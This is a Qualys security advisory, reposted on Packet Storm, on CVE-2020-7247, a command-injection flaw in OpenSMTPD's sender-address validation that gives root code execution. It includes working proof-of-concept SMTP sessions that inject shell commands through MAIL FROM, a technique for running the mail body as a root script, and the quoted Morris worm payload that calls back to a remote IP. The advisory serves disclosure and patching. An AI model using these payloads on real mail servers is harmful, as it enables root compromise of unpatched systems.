what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenBSD OpenSMTPD Privilege Escalation / Code Execution

OpenBSD OpenSMTPD Privilege Escalation / Code Execution
Posted Jan 29, 2020
Authored by Qualys Security Advisory

Qualys discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This vulnerability is exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an attacker to execute arbitrary shell commands, as root.

tags | exploit, arbitrary, shell, root
systems | openbsd
advisories | CVE-2020-7247
SHA-256 | 9415f92980a964e9430ed555502126d19de735d2acfd5db27d83bb342e5a8b2c

OpenBSD OpenSMTPD Privilege Escalation / Code Execution

Change Mirror Download

Qualys Security Advisory

LPE and RCE in OpenSMTPD (CVE-2020-7247)


==============================================================================
Contents
==============================================================================

Summary
Analysis
Exploitation
Acknowledgments


==============================================================================
Summary
==============================================================================

We discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This
vulnerability is exploitable since May 2018 (commit a8e222352f, "switch
smtpd to new grammar") and allows an attacker to execute arbitrary shell
commands, as root:

- either locally, in OpenSMTPD's default configuration (which listens on
the loopback interface and only accepts mail from localhost);

- or locally and remotely, in OpenSMTPD's "uncommented" default
configuration (which listens on all interfaces and accepts external
mail).

We developed a simple proof of concept and successfully tested it
against OpenBSD 6.6 (the current release) and Debian testing (Bullseye);
other versions and distributions may be exploitable.


==============================================================================
Analysis
==============================================================================

OpenSMTPD's smtp_mailaddr() function is responsible for validating
sender (MAIL FROM) and recipient (RCPT TO) mail addresses:

------------------------------------------------------------------------------
2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191 const char *domain)
2192 {
....
2218 if (!valid_localpart(maddr->user) ||
2219 !valid_domainpart(maddr->domain)) {
....
2234 return (0);
2235 }
2236
2237 return (1);
2238 }
------------------------------------------------------------------------------

- it calls valid_domainpart() to validate the domain name (after the @
sign) of a mail address -- this function only accepts IPv4 and IPv6
addresses, and alpha-numeric, '.', '-', and '_' characters;

- it calls valid_localpart() to validate the local part (before the @
sign) of a mail address -- this function only accepts alpha-numeric,
'.', and MAILADDR_ALLOWED characters (a white list from RFC 5322):

71 #define MAILADDR_ALLOWED "!#$%&'*/?^`{|}~+-=_"

Among the characters in MAILADDR_ALLOWED, the ones that are also in
MAILADDR_ESCAPE are later transformed into ':' characters (escaped) by
mda_expand_token():

72 #define MAILADDR_ESCAPE "!#$%&'*?`{|}~"

smtp_mailaddr()'s white-listing and mda_expand_token()'s escaping are
fundamental to OpenSMTPD's security -- they prevent dangerous characters
from reaching the shell that executes MDA commands (in mda_unpriv()):

execle("/bin/sh", "/bin/sh", "-c", mda_command, (char *)NULL,
mda_environ);

Mail Delivery Agents (MDAs) are responsible for delivering mail to local
recipients; for example, OpenSMTPD's default MDA method is "mbox", and
the corresponding MDA command is (in parse.y):

asprintf(&dispatcher->u.local.command,
"/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}");

where %{user.username} is the name of an existing local user (the local
part of the recipient address), and %{mbox.from} is the sender address
(which would be under the complete control of an attacker if it were not
for smtp_mailaddr()'s white-listing and mda_expand_token()'s escaping).

Unfortunately, we discovered a vulnerability in smtp_mailaddr()
(CVE-2020-7247):

------------------------------------------------------------------------------
2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191 const char *domain)
2192 {
....
2218 if (!valid_localpart(maddr->user) ||
2219 !valid_domainpart(maddr->domain)) {
....
2229 if (maddr->domain[0] == '\0') {
2230 (void)strlcpy(maddr->domain, domain,
2231 sizeof(maddr->domain));
2232 return (1);
2233 }
2234 return (0);
2235 }
2236
2237 return (1);
2238 }
------------------------------------------------------------------------------

If the local part of an address is invalid (line 2218) and if its domain
name is empty (line 2229), then smtp_mailaddr() adds the default domain
automatically (line 2230) and returns 1 (line 2232), although it should
return 0 because the local part of the address is invalid (for example,
because it contains invalid characters).

As a result, an attacker can pass dangerous characters that are not in
MAILADDR_ALLOWED and not in MAILADDR_ESCAPE (';' and ' ' in particular)
to the shell that executes the MDA command. For example, the following
local SMTP session executes "sleep 66" as root, in OpenSMTPD's default
configuration:

------------------------------------------------------------------------------
$ nc 127.0.0.1 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [127.0.0.1], pleased to meet you
MAIL FROM:<;sleep 66;>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself

How about a nice game of chess?
.
250 2.0.0 e6330998 Message accepted for delivery
QUIT
221 2.0.0 Bye
------------------------------------------------------------------------------


==============================================================================
Exploitation
==============================================================================

Nevertheless, our ability to execute arbitrary shell commands through
the local part of the sender address is rather limited:

- although OpenSMTPD is less restrictive than RFC 5321, the maximum
length of a local part should be 64 characters;

- the characters in MAILADDR_ESCAPE (for example, '$' and '|') are
transformed into ':' characters.

To overcome these limitations, we drew inspiration from the Morris worm
(https://spaf.cerias.purdue.edu/tech-reps/823.pdf), which exploited the
DEBUG vulnerability in Sendmail by executing the body of a mail as a
shell script:

------------------------------------------------------------------------------
debug
mail from: </dev/null>
rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
data

cd /usr/tmp
cat > x14481910.c <<'EOF'
[text of vector program]
EOF
cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;
rm -f x14481910 x14481910.c

.
quit
------------------------------------------------------------------------------

Indeed, the standard input of an MDA command is the mail itself: "sed"
removes the headers (which were added automatically by the mail server)
and "/bin/sh" executes the body.

We cannot simply reuse this command (because we cannot use the '|' and
'>' characters), but we can use "read" to remove N header lines (where N
is greater than the number of header lines added by the mail server) and
prepend a "NOP slide" of N comment lines to the body of our mail. For
example, the following remote SMTP session executes the body of our
mail, as root, in OpenSMTPD's "uncommented" default configuration:

------------------------------------------------------------------------------
$ nc 192.168.56.143 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [192.168.56.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<root@example.org>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
for i in W O P R; do
echo -n "($i) " && id || break
done >> /root/x."`id -u`"."$$"
.
250 2.0.0 4cdd24df Message accepted for delivery
QUIT
221 2.0.0 Bye
------------------------------------------------------------------------------


==============================================================================
Acknowledgments
==============================================================================

We thank the OpenBSD developers for their great work and their quick
response.



[https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner>



This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close